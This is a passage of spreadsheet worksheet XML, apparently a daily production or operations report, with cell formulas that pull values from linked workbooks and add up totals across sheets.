        <v>31.5960648148148</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]26'!$U$81</f>
        <v>33.2074875356125</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]26'!$V$81</f>
        <v>35.9140978652263</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]26'!$Q$81</f>
        <v>7.58305555555556</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]26'!$R$81</f>
        <v>207.214722222222</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]26'!$S$81</f>
        <v>3102.97805555556</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]26'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]26'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'25'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]26'!$I$17</f>
        <v>5560.23</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'25'!K22</f>
        <v>175704.89</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2067166.27</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]26'!$L$17</f>
        <v>76921.462</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>38.460731</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]26'!$W$79</f>
        <v>106.292896908529</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]26'!$X$79</f>
        <v>101.397879552189</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]26'!$Y$79</f>
        <v>102.194418141189</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]26'!$T$79</f>
        <v>99.9988425925926</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]26'!$U$79</f>
        <v>48.0415776353276</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]26'!$V$79</f>
        <v>45.5710455246914</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]26'!$Q$79</f>
        <v>23.9997222222222</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]26'!$R$79</f>
        <v>299.779444444444</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]26'!$S$79</f>
        <v>3937.33833333333</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]26'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]26'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'25'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]26'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'25'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]26'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]26'!$W$80</f>
        <v>87.8333333333333</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]26'!$X$80</f>
        <v>84.6483885630661</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]26'!$Y$80</f>
        <v>79.5674509425207</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]26'!$T$80</f>
        <v>100</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]26'!$U$80</f>
        <v>36.1374198717949</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]26'!$V$80</f>
        <v>32.7587191358025</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]26'!$Q$80</f>
        <v>24</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]26'!$R$80</f>
        <v>225.4975</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]26'!$S$80</f>
        <v>2830.35333333333</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]26'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]26'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'25'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]26'!$I$56</f>
        <v>1939.23</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'25'!K24</f>
        <v>37701.11</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>317527.64</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]26'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]26'!$R$6</f>
        <v>77.2916666666667</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]26'!$S$6</f>
        <v>84.5353934987169</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]26'!$T$6</f>
        <v>86.0278021015762</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]26'!$O$6</f>
        <v>100</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]26'!$P$6</f>
        <v>59.9487179487179</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]26'!$Q$6</f>
        <v>52.8703703703704</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]26'!$L$6</f>
        <v>24</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]26'!$M$6</f>
        <v>374.08</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]26'!$N$6</f>
        <v>4568</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]26'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'25'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]26'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'25'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]26'!$R$7</f>
        <v>135.487179487179</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]26'!$S$7</f>
        <v>191.2</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]26'!$T$7</f>
        <v>187.860902745846</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]26'!$O$7</f>
        <v>40.625</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]26'!$P$7</f>
        <v>55.8894230769231</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]26'!$Q$7</f>
        <v>50.5940972222222</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]26'!$L$7</f>
        <v>9.75</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]26'!$M$7</f>
        <v>348.75</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]26'!$N$7</f>
        <v>4371.33</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'25'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'25'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]26'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]26'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]26'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]26'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]26'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]26'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]26'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]26'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]26'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'25'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'25'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]26'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]26'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]26'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]26'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]26'!$U$69</f>
        <v>61.161858974359</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]26'!$V$69</f>
        <v>67.8533564814815</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]26'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]26'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]26'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'25'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'25'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]26'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]26'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]26'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]26'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]26'!$U$104</f>
        <v>37.0139423076923</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]26'!$V$104</f>
        <v>62.3960300925926</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]26'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]26'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]26'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'25'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'25'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]26'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]26'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]26'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]26'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]26'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]26'!$V$105</f>
        <v>32.4558101851852</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]26'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]26'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]26'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'25'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'25'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]26'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]26'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]26'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]26'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]26'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]26'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]26'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]26'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]26'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]26'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]26'!$E$16</f>
        <v>2888</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'25'!H31</f>
        <v>118560</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1491567</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]26'!$I$16</f>
        <v>5133.34000000001</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'25'!K31</f>
        <v>128554.01</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1484602.14</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]26'!$L$16</f>
        <v>55435.36</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>73.9138133333333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'[11]26'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]26'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'25'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]26'!$I$13</f>
        <v>2042</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'25'!K32</f>
        <v>87181</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1108659</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]26'!$L$13</f>
        <v>54251.626</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>108.503252</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]26'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]26'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]26'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]26'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]26'!$U$76</f>
        <v>4.00641025641026e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]26'!$V$76</f>
        <v>4.1087962962963e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]26'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]26'!$R$76</f>
        <v>2.5e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]26'!$S$76</f>
        <v>3.55e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]26'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'25'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]26'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'25'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]26'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]26'!$W$77</f>
        <v>23</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]26'!$X$77</f>
        <v>20.1</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]26'!$Y$77</f>
        <v>19.78</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]26'!$T$77</f>
        <v>100.000000000042</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]26'!$U$77</f>
        <v>20.5496794871811</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]26'!$V$77</f>
        <v>60.0468750000014</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]26'!$Q$77</f>
        <v>24.00000000001</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]26'!$R$77</f>
        <v>128.23000000001</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]26'!$S$77</f>
        <v>5188.05000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]26'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'25'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]26'!$I$50</f>
        <v>2719.64</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'25'!K34</f>
        <v>22078.88</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>489281.81</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]26'!$L$15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'[11]26'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'25'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]26'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'25'!K35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G36+'25'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'25'!K36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G37+'25'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'25'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]26'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]26'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]26'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'25'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]26'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'25'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]26'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'25'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'25'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]26'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]26'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]26'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'25'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]26'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'25'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]26'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'25'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'25'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]26'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]26'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]26'!$R$50</f>
        <v>224.06</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'25'!U39</f>
        <v>8227.38</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>87040.979</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]26'!$V$50</f>
        <v>209</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'25'!X39</f>
        <v>8149</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>86908</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]26'!$Y$50</f>
        <v>1309.926</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'25'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'25'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
